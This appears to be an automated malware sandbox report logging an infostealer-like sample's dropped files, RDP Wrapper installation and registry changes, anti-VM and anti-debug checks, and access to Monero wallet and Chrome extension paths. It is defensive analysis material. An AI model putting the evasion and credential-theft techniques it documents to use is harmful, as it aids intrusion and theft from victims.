Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\ProgramData\JKEHIIJJEC.exe	File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5db9e54794_vfkagks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\JKEHIIJJEC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\EBAAFCAFCB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5dbaca34ac_lfdnsafnds[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KECGDBFCBK.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\JKEHIIJJEC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\EBAAFCAFCB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KECGDBFCBK.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Jump to dropped file

Source: C:\Windows\System32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\JKEHIIJJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3af5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3af5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2828, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory allocated: 4CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory allocated: 2A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Memory allocated: B50000 memory reserve \| memory write watch
Source: C:\ProgramData\JKEHIIJJEC.exe	Memory allocated: 2480000 memory reserve \| memory write watch
Source: C:\ProgramData\JKEHIIJJEC.exe	Memory allocated: 4480000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\JKEHIIJJEC.exe	Window / User API: threadDelayed 4038
Source: C:\ProgramData\JKEHIIJJEC.exe	Window / User API: threadDelayed 5925

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 2500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe TID: 2332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2464	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe TID: 5744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe TID: 964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\JKEHIIJJEC.exe TID: 3356	Thread sleep count: 4038 > 30
Source: C:\ProgramData\JKEHIIJJEC.exe TID: 3356	Thread sleep count: 5925 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 3136	Thread sleep count: 48 > 30

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0H
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000250B000.00000004.00000800.00020000.00000000.sdmp, JKEHIIJJEC.exe, 00000010.00000002.2514195438.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000002C.00000002.2458012683.00000000029E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: RegAsm.exe, 00000003.00000002.2126523047.0000000001042000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2177981551.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~,
Source: JKEHIIJJEC.exe, 00000010.00000002.2512477179.0000000000800000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: net1.exe, 0000002C.00000002.2458012683.00000000029E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-67092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-67076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-68407

Source: C:\Windows\System32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004476D0 LdrInitializeThunk,

12_2_004476D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]	3_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]	3_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\ProgramData\JKEHIIJJEC.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042762E SetUnhandledExceptionFilter,	3_2_0042762E
